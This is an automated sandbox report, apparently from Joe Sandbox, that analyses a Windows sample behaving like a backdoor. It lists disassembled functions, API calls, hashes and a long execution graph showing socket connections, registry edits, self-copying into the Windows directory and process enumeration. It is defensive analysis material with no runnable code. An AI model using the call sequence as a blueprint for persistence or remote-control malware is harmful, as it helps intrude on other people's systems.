                                • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                Function 00402A37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00402A4D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: WS2_32.dll$htons
                                • API String ID: 1029625771-178149120
                                • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                Function 00408680 Relevance: 6.0, APIs: 4, Instructions: 37networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • htons.WS2_32 ref: 004086B2
                                • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                • closesocket.WS2_32(00000000), ref: 004086D1
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocketconnecthtonssocket
                                • String ID:
                                • API String ID: 3817148366-0
                                • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA
                                Function 004034E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadwsprintf
                                • String ID: hra%u.dll
                                • API String ID: 2341783205-640331709
                                • Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
                                • Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99

                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:53.2%
                                Signature Coverage:11.5%
                                Total number of Nodes:714
                                Total number of Limit Nodes:38
                                execution_graph 19424 10002ab0 CreateThread CloseHandle 19445 10009720 ??2@YAPAXI FindResourceA LoadResource LockResource 19424->19445 19480 100022f0 19424->19480 19426 10002aea 19427 10002af7 19426->19427 19428 10002b5a 19426->19428 19449 10012620 CreateToolhelp32Snapshot ??2@YAPAXI Process32First 19427->19449 19429 10009720 5 API calls 19428->19429 19432 10002b6b 19429->19432 19431 10002b01 19433 10002b23 19431->19433 19434 10002b08 CreateThread CloseHandle Sleep 19431->19434 19435 10002b76 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19432->19435 19436 10002bf7 19432->19436 19437 10012620 7 API calls 19433->19437 19434->19433 19533 10002820 GetModuleHandleA LoadIconA LoadCursorA RegisterClassExA CreateWindowExA 19434->19533 19438 10009720 5 API calls 19435->19438 19441 10002c1d Sleep 19436->19441 19444 10002c09 CreateThread CloseHandle 19436->19444 19439 10002b2d 19437->19439 19440 10002bcd lstrcat lstrcat MoveFileA 19438->19440 19442 10002b41 CreateThread CloseHandle 19439->19442 19443 10002b34 WinExec 19439->19443 19440->19436 19441->19441 19442->19436 19471 10002930 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19442->19471 19443->19442 19444->19441 19456 10001a20 GetSystemDirectoryA wsprintfA 19444->19456 19446 1000977b 19445->19446 19447 10009792 19446->19447 19448 10009783 ??3@YAXPAX 19446->19448 19447->19426 19448->19426 19450 1001268f 19449->19450 19451 1001264f _strcmpi 19449->19451 19450->19431 19452 10012665 19451->19452 19453 1001266d Process32Next 19451->19453 19452->19431 19453->19450 19454 10012678 lstrcmpiA 19453->19454 19454->19452 19455 10012684 Process32Next 19454->19455 19455->19450 19455->19454 19539 100018a0 CreateToolhelp32Snapshot 19456->19539 19458 10001a97 19459 10001ac2 Sleep FindFirstFileA 19458->19459 19460 10001a9b CreateFileA CloseHandle 19458->19460 19461 10001af8 GetCurrentDirectoryA strstr 19459->19461 19462 10001aea 19459->19462 19460->19459 19463 10001b40 19461->19463 19464 10001b4e Sleep GetVersionExA GetSystemDefaultLCID 19461->19464 19465 10001bdd 32 API calls 19464->19465 19466 10001b7e 19464->19466 19466->19465 19468 10012620 7 API calls 19466->19468 19469 10001bcf 19468->19469 19469->19465 19470 10001bd6 Sleep 19469->19470 19470->19465 19472 10009720 5 API calls 19471->19472 19473 10002991 lstrcat CreateDirectoryA Sleep wsprintfA lstrcat 19472->19473 19474 10009720 5 API calls 19473->19474 19475 10002a09 19474->19475 19476 10002a10 MoveFileA 19475->19476 19477 10002a23 CopyFileA wsprintfA lstrlen 19475->19477 19476->19477 19551 1000dda0 19477->19551 19481 1000230f 19480->19481 19482 10009720 5 API calls 19481->19482 19483 10002322 19482->19483 19484 10009720 5 API calls 19483->19484 19485 10002335 19484->19485 19486 10009720 5 API calls 19485->19486 19487 10002348 19486->19487 19488 10002360 sprintf CreateMutexA GetLastError 19487->19488 19491 10002359 19487->19491 19489 100023b1 CloseHandle ExitProcess 19488->19489 19490 100023bf 6 API calls 19488->19490 19492 10002438 SetProcessWindowStation 19490->19492 19493 1000243f SetErrorMode 19490->19493 19492->19493 19568 10003780 19493->19568 19495 10002458 19496 10009720 5 API calls 19495->19496 19497 10002470 19496->19497 19498 10002477 19497->19498 19509 100024b0 19497->19509 19614 1000c4f0 19498->19614 19503 100024ca OpenEventA 19505 100024e5 Sleep 19503->19505 19526 100024c8 19503->19526 19505->19503 19505->19526 19506 10009720 ??2@YAPAXI FindResourceA LoadResource LockResource ??3@YAXPAX 19506->19509 19507 1000251d ??3@YAXPAX 19507->19509 19509->19506 19509->19507 19511 10001160 malloc realloc 19509->19511 19512 100011b0 lstrlen ??2@YAPAXI strchr strchr atoi 19509->19512 19513 10002627 GetTickCount 19509->19513 19515 10002614 ??3@YAXPAX 19509->19515 19516 100025c3 ??3@YAXPAX 19509->19516 19517 10002669 GetTickCount 19509->19517 19518 10002572 ??3@YAXPAX 19509->19518 19521 100026e0 Sleep 19509->19521 19522 10002716 GetTickCount 19509->19522 19524 10002718 OpenEventA WaitForSingleObject Sleep 19509->19524 19509->19526 19605 1000c450 19509->19605 19510 100024fd CloseHandle 19510->19509 19511->19509 19512->19509 19577 10003940 19513->19577 19515->19509 19516->19509 19590 10001600 GetVersionExA 19517->19590 19518->19509 19521->19509 19522->19524 19523 1000c660 3 API calls 19523->19526 19524->19509 19525 10002752 19524->19525 19627 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19525->19627 19526->19503 19526->19509 19526->19523 19626 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19526->19626 19528 1000275b CloseHandle 19529 1000c660 3 API calls 19528->19529 19530 10002778 SetErrorMode ReleaseMutex CloseHandle 19529->19530 19628 10003880 WaitForSingleObject 19530->19628 19534 100028c0 ShowWindow UpdateWindow GetMessageA 19533->19534 19535 1000291c 19533->19535 19534->19535 19536 100028e7 19534->19536 19537 100028f4 TranslateMessage DispatchMessageA GetMessageA 19536->19537 19537->19537 19538 10002913 19537->19538 19540 100018f1 Process32First 19539->19540 19541 10001a07 19539->19541 19542 10001a00 CloseHandle 19540->19542 19547 1000190c GetCurrentProcessId 19540->19547 19541->19458 19542->19541 19544 10001924 OpenProcess 19544->19541 19546 10001940 GetModuleFileNameExA 19544->19546 19545 100019dc Process32Next 19545->19542 19545->19547 19546->19541 19548 1000195d _strcmpi 19546->19548 19547->19544 19547->19545 19549 100019f0 19548->19549 19550 100019d1 CloseHandle 19548->19550 19549->19458 19550->19545 19552 1000ddd7 19551->19552 19563 1000de5b 19551->19563 19553 1000de05 RegOpenKeyExA 19552->19553 19554 1000de86 RegOpenKeyExA 19552->19554 19555 1000deb6 RegOpenKeyExA 19552->19555 19556 1000ddde RegCreateKeyExA 19552->19556 19559 1000de25 19553->19559 19553->19563 19560 1000dea2 RegDeleteKeyA 19554->19560 19554->19563 19561 1000ded2 RegDeleteValueA 19555->19561 19555->19563 19556->19553 19556->19563 19558 10002a77 Sleep FindWindowA PostMessageA 19559->19563 19564 1000de60 RegSetValueExA 19559->19564 19565 1000de35 19559->19565 19562 1000deb4 19560->19562 19560->19563 19561->19563 19562->19563 19567 1000df0b RegCloseKey RegCloseKey 19563->19567 19564->19563 19565->19563 19566 1000de3e RegSetValueExA 19565->19566 19566->19563 19567->19558 19640 100033d0 RtlInitializeCriticalSection 19568->19640 19570 100037aa 19641 100033d0 RtlInitializeCriticalSection 19570->19641 19572 100037bd 19642 100033d0 RtlInitializeCriticalSection 19572->19642 19574 100037cd 19643 100033d0 RtlInitializeCriticalSection 19574->19643 19576 100037dd WSAStartup CreateEventA 19576->19495 19644 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19577->19644 19579 1000394c ResetEvent socket 19580 10003981 gethostbyname 19579->19580 19581 10003977 19579->19581 19582 10003992 19580->19582 19583 1000399c htons connect 19580->19583 19581->19509 19582->19509 19584 100039e1 setsockopt 19583->19584 19585 100039d7 19583->19585 19586 10003a05 WSAIoctl 19584->19586 19587 10003a3f 19584->19587 19585->19509 19586->19587 19645 100126a0 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19587->19645 19589 10003a5b 19589->19509 19646 100012e0 wsprintfA 19590->19646 19592 10001644 getsockname 19651 10001240 RegOpenKeyA RegQueryValueExA RegCloseKey 19592->19651 19594 100016a4 GetSystemInfo 19652 100012a0 19594->19652 19597 10009720 5 API calls 19598 1000170c 19597->19598 19656 10001160 19598->19656 19600 10001715 19659 100014b0 19600->19659 19602 1000174b 19669 10003e30 19602->19669 19604 1000175f 19604->19509 19779 1000d1d0 19605->19779 19607 1000c45e 19608 1000c472 lstrcpy 19607->19608 19609 1000c479 19607->19609 19608->19609 19610 1000c481 lstrcpy 19609->19610 19611 1000c48b 19609->19611 19610->19611 19612 1000c493 lstrcpy 19611->19612 19613 1000c49b 19611->19613 19612->19613 19613->19509 19615 1000d1d0 CreateEventA 19614->19615 19616 10002488 19615->19616 19617 1000c520 19616->19617 19783 100126a0 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19617->19783 19619 1000249c 19620 1000c660 19619->19620 19621 1000c676 19620->19621 19624 1000c6a2 19620->19624 19622 1000c684 TerminateThread CloseHandle 19621->19622 19622->19622 19622->19624 19784 1000d220 CloseHandle 19624->19784 19625 1000c6ab 19625->19509 19626->19510 19627->19528 19629 100038d2 CloseHandle CloseHandle WSACleanup 19628->19629 19630 100038cb 19628->19630 19786 10003420 19629->19786 19785 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19630->19785 19633 100038fd 19634 10003420 2 API calls 19633->19634 19635 1000390a 19634->19635 19636 10003420 2 API calls 19635->19636 19637 10003917 19636->19637 19638 10003420 2 API calls 19637->19638 19639 100027a0 19638->19639 19639->19491 19640->19570 19641->19572 19642->19574 19643->19576 19644->19579 19645->19589 19699 1000d900 RegOpenKeyExA 19646->19699 19648 1000134c lstrlen 19649 10001364 lstrlen 19648->19649 19650 1000135c gethostname 19648->19650 19649->19592 19650->19649 19651->19594 19653 100012ab 19652->19653 19654 100012ce GlobalMemoryStatus 19653->19654 19655 100012af 6E9B1E00 19653->19655 19654->19597 19655->19653 19655->19654 19733 10001000 malloc 19656->19733 19658 10001179 19658->19600 19660 10009720 5 API calls 19659->19660 19661 100014ca GetSystemDirectoryA FindFirstFileA 19660->19661 19662 10001551 19661->19662 19663 10001556 CreateFileA ReadFile 19661->19663 19737 10001380 19662->19737 19665 100015ba CloseHandle wsprintfA lstrlen 19663->19665 19666 100015af wsprintfA 19663->19666 19667 100015e7 lstrlen 19665->19667 19668 100015dc wsprintfA 19665->19668 19666->19665 19667->19602 19668->19667 19744 10003740 RtlEnterCriticalSection 19669->19744 19671 10003e47 19672 10003e53 _ftol ??2@YAPAXI 19671->19672 19673 10003f84 19671->19673 19674 10003e87 19672->19674 19676 10003e91 19672->19676 19675 10003450 7 API calls 19673->19675 19674->19604 19677 10003f94 19675->19677 19680 10003ec3 19676->19680 19681 10003ead ??3@YAXPAX 19676->19681 19678 10003740 6 API calls 19677->19678 19679 10003f9e 19678->19679 19682 10003450 7 API calls 19679->19682 19754 10003450 RtlEnterCriticalSection 19680->19754 19681->19604 19687 10003f58 19682->19687 19684 10003ede 19685 10003450 7 API calls 19684->19685 19686 10003eec 19685->19686 19688 10003450 7 API calls 19686->19688 19747 10003fb0 19687->19747 19689 10003efa 19688->19689 19690 10003450 7 API calls 19689->19690 19692 10003f07 ??3@YAXPAX ??2@YAPAXI 19690->19692 19693 10003740 6 API calls 19692->19693 19695 10003f3e 19693->19695 19696 10003450 7 API calls 19695->19696 19697 10003f4b 19696->19697 19697->19687 19698 10003f4f ??3@YAXPAX 19697->19698 19698->19687 19700 1000d976 19699->19700 19701 1000d99d 19699->19701 19727 1000dd1f RegCloseKey RegCloseKey 19700->19727 19705 1000db42 RegEnumKeyExA 19701->19705 19706 1000dd02 lstrcat 19701->19706 19707 1000d9c4 RegQueryValueExA 19701->19707 19708 1000dccb wsprintfA 19701->19708 19709 1000da07 RegQueryValueExA 19701->19709 19710 1000daca RegQueryValueExA 19701->19710 19711 1000d9b0 19701->19711 19712 1000db11 RegQueryValueExA 19701->19712 19713 1000dc6a wsprintfA 19701->19713 19714 1000dbde RegEnumValueA 19701->19714 19715 1000dc9e wsprintfA 19701->19715 19725 1000da00 19701->19725 19703 1000d989 19703->19648 19717 1000db8a wsprintfA 19705->19717 19705->19725 19706->19648 19721 1000d9f4 19707->19721 19707->19725 19708->19706 19722 1000da33 19709->19722 19709->19725 19716 1000daf6 wsprintfA 19710->19716 19710->19725 19711->19706 19711->19707 19711->19708 19711->19709 19711->19710 19711->19712 19711->19713 19711->19715 19711->19725 19712->19725 19713->19706 19718 1000dc56 19714->19718 19714->19725 19715->19706 19716->19725 19717->19705 19718->19706 19718->19708 19718->19713 19718->19715 19728 1000d8d0 19721->19728 19722->19725 19726 1000da4d strncat strncat strchr 19722->19726 19723 1000dab6 19723->19648 19732 1000dd1f RegCloseKey RegCloseKey 19725->19732 19726->19722 19727->19703 19729 1000d8e2 _strnicmp 19728->19729 19730 1000d8f3 19729->19730 19731 1000d8f7 19729->19731 19730->19729 19731->19725 19732->19723 19734 10001107 realloc 19733->19734 19736 10001037 19733->19736 19734->19658 19735 100010fe 19735->19658 19736->19734 19736->19735 19738 10009720 5 API calls 19737->19738 19739 1000139a 19738->19739 19740 10001160 2 API calls 19739->19740 19741 100013a3 wsprintfA 19740->19741 19742 10009720 5 API calls 19741->19742 19743 100013d7 GetSystemDirectoryA CreateFileA WriteFile CloseHandle 19742->19743 19743->19663 19760 10003670 19744->19760 19746 10003760 RtlLeaveCriticalSection 19746->19671 19748 1000401a 19747->19748 19751 10003fce 19747->19751 19750 10004020 send 19748->19750 19753 10003f7a 19748->19753 19749 10003fd6 send 19749->19751 19750->19748 19750->19753 19751->19749 19752 10004000 Sleep 19751->19752 19751->19753 19752->19748 19752->19751 19753->19604 19755 1000346b 19754->19755 19771 100035a0 19755->19771 19757 10003479 19758 1000348e RtlLeaveCriticalSection 19757->19758 19759 1000347e RtlLeaveCriticalSection 19757->19759 19758->19684 19759->19684 19761 1000367c 19760->19761 19762 10003684 19761->19762 19763 1000368e ceil _ftol 19761->19763 19762->19746 19764 100036c4 19763->19764 19765 100036d2 VirtualAlloc 19764->19765 19766 100036c8 19764->19766 19769 10003590 19765->19769 19766->19746 19770 10003597 VirtualFree 19769->19770 19770->19746 19772 100035ad 19771->19772 19773 100035c0 ceil _ftol VirtualAlloc 19772->19773 19774 100035b5 19772->19774 19775 10003615 19773->19775 19776 10003609 19773->19776 19774->19757 19777 1000363c VirtualFree 19775->19777 19778 1000364e 19775->19778 19776->19757 19777->19778 19778->19757 19782 10004060 19779->19782 19781 1000d1e6 CreateEventA 19781->19607 19782->19781 19783->19619 19784->19625 19785->19629 19787 10003430 VirtualFree 19786->19787 19788 1000343e RtlDeleteCriticalSection 19786->19788 19787->19788 19788->19633 19789 10003a70 19792 10003a7a 19789->19792 19790 10003aac select 19791 10003b33 19790->19791 19790->19792 19821 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19791->19821 19792->19790 19794 10003add recv 19792->19794 19796 10003b23 19792->19796 19797 10003b70 19792->19797 19794->19791 19794->19792 19798 10003ba4 19797->19798 19799 10003bbc 19797->19799 19822 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19798->19822 19801 10003c03 19799->19801 19804 10003bd2 19799->19804 19802 10003450 7 API calls 19801->19802 19808 10003c12 19802->19808 19803 10003ba9 19803->19792 19805 10003e30 22 API calls 19804->19805 19806 10003bf0 19805->19806 19806->19792 19807 10003c49 _CxxThrowException 19807->19808 19808->19803 19808->19807 19811 10003d75 _CxxThrowException 19808->19811 19814 100034d0 8 API calls 19808->19814 19817 10003d60 _CxxThrowException 19808->19817 19818 10003740 6 API calls 19808->19818 19819 10003450 7 API calls 19808->19819 19820 10003d46 ??3@YAXPAX ??3@YAXPAX 19808->19820 19823 100034d0 RtlEnterCriticalSection 19808->19823 19810 10003cb3 ??2@YAPAXI ??2@YAPAXI 19810->19808 19810->19811 19812 10003740 6 API calls 19811->19812 19813 10003d95 19812->19813 19815 10003e30 22 API calls 19813->19815 19814->19808 19816 10003da0 19815->19816 19816->19792 19817->19811 19818->19808 19819->19808 19820->19808 19821->19796 19822->19803 19824 100034eb 19823->19824 19825 100034f3 RtlLeaveCriticalSection 19824->19825 19826 10003503 19824->19826 19825->19810 19827 1000355b 19826->19827 19828 1000353d memmove 19826->19828 19829 10003670 4 API calls 19827->19829 19828->19827 19830 1000356a RtlLeaveCriticalSection 19829->19830 19830->19810 19831 10003670 19832 1000367c 19831->19832 19833 10003684 19832->19833 19834 1000368e ceil _ftol 19832->19834 19835 100036c4 19834->19835 19836 100036d2 VirtualAlloc 19835->19836 19837 100036c8 19835->19837 19838 10003590 19836->19838 19839 100036f1 VirtualFree 19838->19839 19840 10015e40 calloc 19841 401a39 GetVersion 19866 402f1c HeapCreate 19841->19866 19843 401a98 19844 401aa5 19843->19844 19845 401a9d 19843->19845 19878 403a7d 19844->19878 19948 401b54 19845->19948 19848 401aad GetCommandLineA 19892 40394b 19848->19892 19853 401ac7 19924 403645 19853->19924 19855 401acc 19856 401ad1 GetStartupInfoA 19855->19856 19937 4035ed 19856->19937 19858 401ae3 GetModuleHandleA 19941 401630 GetVersionExA 19858->19941 19867 402f72 19866->19867 19868 402f3c 19866->19868 19867->19843 19961 402dd4 19868->19961 19871 402f58 19874 402f75 19871->19874 19975 4026bf 19871->19975 19872 402f4b 19973 401b78 HeapAlloc 19872->19973 19874->19843 19875 402f55 19875->19874 19877 402f66 HeapDestroy 19875->19877 19877->19867 20038 4032b5 19878->20038 19881 403a9c GetStartupInfoA 19889 403ae8 19881->19889 19890 403bad 19881->19890 19884 403c14 SetHandleCount 19884->19848 19885 403bd4 GetStdHandle 19888 403be2 GetFileType 19885->19888 19885->19890 19886 403b59 19886->19890 19891 403b7b GetFileType 19886->19891 19887 4032b5 12 API calls 19887->19889 19888->19890 19889->19886 19889->19887 19889->19890 19890->19884 19890->19885 19891->19886 19893 403966 GetEnvironmentStringsW 19892->19893 19894 403999 19892->19894 19895 40396e 19893->19895 19897 40397a GetEnvironmentStrings 19893->19897 19894->19895 19896 40398a 19894->19896 19898 4039a6 GetEnvironmentStringsW 19895->19898 19901 4039b2 19895->19901 19899 403a2c GetEnvironmentStrings 19896->19899 19902 401abd 19896->19902 19903 403a38 19896->19903 19897->19896 19897->19902 19898->19901 19898->19902 19899->19902 19899->19903 19900 4039c7 WideCharToMultiByte 19904 4039e6 19900->19904 19905 403a18 FreeEnvironmentStringsW 19900->19905 19901->19900 19901->19901 19915 4036fe 19902->19915 19906 4032b5 12 API calls 19903->19906 19907 4032b5 12 API calls 19904->19907 19905->19902 19913 403a53 19906->19913 19908 4039ec 19907->19908 19908->19905 19909 4039f5 WideCharToMultiByte 19908->19909 19911 403a0f 19909->19911 19912 403a06 19909->19912 19910 403a69 FreeEnvironmentStringsA 19910->19902 19911->19905 20104 4019d0 19912->20104 19913->19910 19916 403710 19915->19916 19917 403715 GetModuleFileNameA 19915->19917 20134 404b15 19916->20134 19919 403738 19917->19919 19920 4032b5 12 API calls 19919->19920 19921 403759 19920->19921 19922 401b2f 7 API calls 19921->19922 19923 403769 19921->19923 19922->19923 19923->19853 19925 403652 19924->19925 19927 403657 19924->19927 19926 404b15 19 API calls 19925->19926 19926->19927 19928 4032b5 12 API calls 19927->19928 19929 403684 19928->19929 19930 401b2f 7 API calls 19929->19930 19935 403698 19929->19935 19930->19935 19931 4036db 19932 4019d0 7 API calls 19931->19932 19933 4036e7 19932->19933 19933->19855 19934 4032b5 12 API calls 19934->19935 19935->19931 19935->19934 19936 401b2f 7 API calls 19935->19936 19936->19935 19938 4035f6 19937->19938 19940 4035fb 19937->19940 19939 404b15 19 API calls 19938->19939 19939->19940 19940->19858 19942 4016f9 19941->19942 19943 40165d GetWindowsDirectoryA wsprintfA 19941->19943 20158 4015e0 19942->20158 19943->19942 19944 4016df GetFileAttributesA 19943->19944 19944->19942 19946 4016f1 ExitProcess 19944->19946 19949 401b62 19948->19949 19950 401b5d 19948->19950 19952 403e31 7 API calls 19949->19952 19951 403df8 7 API calls 19950->19951 19951->19949 19953 401b6b ExitProcess 19952->19953 19954 403394 20245 4033b6 19954->20245 19957 403469 19958 403475 19957->19958 19959 40359e UnhandledExceptionFilter 19958->19959 19960 401b21 19958->19960 19959->19960 19984 4046e0 19961->19984 19964 402e17 GetEnvironmentVariableA 19966 402ef4 19964->19966 19969 402e36 19964->19969 19965 402dfd 19965->19964 19967 402e0f 19965->19967 19966->19967 19989 402da7 GetModuleHandleA 19966->19989 19967->19871 19967->19872 19970 402e7b GetModuleFileNameA 19969->19970 19972 402e73 19969->19972 19970->19972 19972->19966 19986 404328 19972->19986 19974 401b94 19973->19974 19974->19875 19976 4026d3 HeapAlloc 19975->19976 19977 4026cc 19975->19977 19978 4026f0 VirtualAlloc 19976->19978 19979 402728 19976->19979 19977->19978 19980 402710 VirtualAlloc 19978->19980 19981 4027e5 19978->19981 19979->19875 19980->19979 19982 4027d7 VirtualFree 19980->19982 19981->19979 19983 4027ed HeapFree 19981->19983 19982->19981 19983->19979 19985 402de1 GetVersionExA 19984->19985 19985->19964 19985->19965 19991 40433f 19986->19991 19990 402dbe 19989->19990 19990->19967 19993 404357 19991->19993 19995 404387 19993->19995 19998 404f0a 19993->19998 19994 404f0a 6 API calls 19994->19995 19995->19994 19997 40433b 19995->19997 20002 404e3e 19995->20002 19997->19966 19999 404f1c 19998->19999 20000 404f28 19998->20000 19999->19993 20008 4051ce 20000->20008 20003 404e69 20002->20003 20007 404e4c 20002->20007 20004 404f0a 6 API calls 20003->20004 20005 404e85 20003->20005 20004->20005 20005->20007 20020 404f7f 20005->20020 20007->19995 20009 405217 20008->20009 20010 4051ff GetStringTypeW 20008->20010 20012 405242 GetStringTypeA 20009->20012 20013 405266 20009->20013 20010->20009 20011 40521b GetStringTypeA 20010->20011 20011->20009 20014 405303 20011->20014 20012->20014 20013->20014 20016 40527c MultiByteToWideChar 20013->20016 20014->19999 20016->20014 20017 4052a0 20016->20017 20017->20014 20018 4052da MultiByteToWideChar 20017->20018 20018->20014 20019 4052f3 GetStringTypeW 20018->20019 20019->20014 20021 404fcb 20020->20021 20022 404faf LCMapStringW 20020->20022 20025 405031 20021->20025 20026 405014 LCMapStringA 20021->20026 20022->20021 20023 404fd3 LCMapStringA 20022->20023 20023->20021 20024 40510d 20023->20024 20024->20007 20025->20024 20027 405047 MultiByteToWideChar 20025->20027 20026->20024 20027->20024 20028 405071 20027->20028 20028->20024 20029 4050a7 MultiByteToWideChar 20028->20029 20029->20024 20030 4050c0 LCMapStringW 20029->20030 20030->20024 20031 4050db 20030->20031 20032 4050e1 20031->20032 20034 405121 20031->20034 20032->20024 20033 4050ef LCMapStringW 20032->20033 20033->20024 20034->20024 20035 405159 LCMapStringW 20034->20035 20035->20024 20036 405171 WideCharToMultiByte 20035->20036 20036->20024 20047 4032c7 20038->20047 20041 401b2f 20042 401b38 20041->20042 20043 401b3d 20041->20043 20084 403df8 20042->20084 20090 403e31 20043->20090 20048 4032c4 20047->20048 20050 4032ce 20047->20050 20048->19881 20048->20041 20050->20048 20051 4032f3 20050->20051 20052 403302 20051->20052 20054 403317 20051->20054 20059 403310 20052->20059 20060 401f14 20052->20060 20055 403356 HeapAlloc 20054->20055 20054->20059 20066 4029b7 20054->20066 20056 403365 20055->20056 20056->20050 20057 403315 20057->20050 20059->20055 20059->20056 20059->20057 20064 401f46 20060->20064 20061 401fe5 20063 401ff4 20061->20063 20080 4022ce 20061->20080 20063->20059 20064->20061 20064->20063 20073 40221d 20064->20073 20069 4029c5 20066->20069 20067 402ab1 VirtualAlloc 20072 402a82 20067->20072 20068 402b86 20070 4026bf 5 API calls 20068->20070 20069->20067 20069->20068 20069->20072 20070->20072 20072->20059 20074 402260 HeapAlloc 20073->20074 20075 402230 HeapReAlloc 20073->20075 20076 4022b0 20074->20076 20078 402286 VirtualAlloc 20074->20078 20075->20076 20077 40224f 20075->20077 20076->20061 20077->20074 20078->20076 20079 4022a0 HeapFree 20078->20079 20079->20076 20081 4022e0 VirtualAlloc 20080->20081 20083 402329 20081->20083 20083->20063 20085 403e02 20084->20085 20086 403e2f 20085->20086 20087 403e31 7 API calls 20085->20087 20086->20043 20088 403e19 20087->20088 20089 403e31 7 API calls 20088->20089 20089->20086 20091 403e44 20090->20091 20092 403f5b 20091->20092 20093 403e84 20091->20093 20098 401b46 20091->20098 20094 403f6e GetStdHandle WriteFile 20092->20094 20095 403e90 GetModuleFileNameA 20093->20095 20093->20098 20094->20098 20096 403ea8 20095->20096 20099 404cab 20096->20099 20098->19881 20100 404cb8 LoadLibraryA 20099->20100 20101 404cfa 20099->20101 20100->20101 20102 404cc9 GetProcAddress 20100->20102 20101->20098 20102->20101 20103 404ce0 GetProcAddress GetProcAddress 20102->20103 20103->20101 20105 4019f8 20104->20105 20106 4019dc 20104->20106 20105->19911 20107 4019e6 20106->20107 20108 4019fc 20106->20108 20110 401a28 HeapFree 20107->20110 20111 4019f2 20107->20111 20109 401a27 20108->20109 20113 401a16 20108->20113 20109->20110 20110->20105 20115 401beb 20111->20115 20121 402972 20113->20121 20116 401c29 20115->20116 20120 401edf 20115->20120 20117 401e25 VirtualFree 20116->20117 20116->20120 20118 401e89 20117->20118 20119 401e98 VirtualFree HeapFree 20118->20119 20118->20120 20119->20120 20120->20105 20122 4029b5 20121->20122 20123 40299f 20121->20123 20122->20105 20123->20122 20125 402859 20123->20125 20128 402866 20125->20128 20126 402916 20126->20122 20127 402887 VirtualFree 20127->20128 20128->20126 20128->20127 20130 402803 VirtualFree 20128->20130 20131 402820 20130->20131 20132 402850 20131->20132 20133 402830 HeapFree 